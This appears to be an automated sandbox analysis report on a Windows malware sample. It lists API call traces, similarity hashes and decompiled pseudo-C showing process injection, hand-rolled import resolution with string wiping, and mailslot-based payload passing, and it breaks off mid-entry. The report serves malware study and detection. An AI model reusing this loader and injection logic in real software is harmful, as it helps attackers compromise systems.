Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 63657

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	707D88A25F54B3F8785905F254974BCE
Total matches:	35
Initial Analysis Report:	Open
Initial sample Analysis ID:	63657
Initial sample SHA 256:	8A647D2B5F178B35CEBC334CAD30C8D315F3482D8395263A2C84DB68B5510A62
Initial sample name:	status.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
